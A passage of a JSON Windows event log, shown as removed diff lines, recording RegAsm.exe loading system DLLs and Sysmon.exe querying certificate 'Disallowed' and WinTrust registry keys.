"combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570863869984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 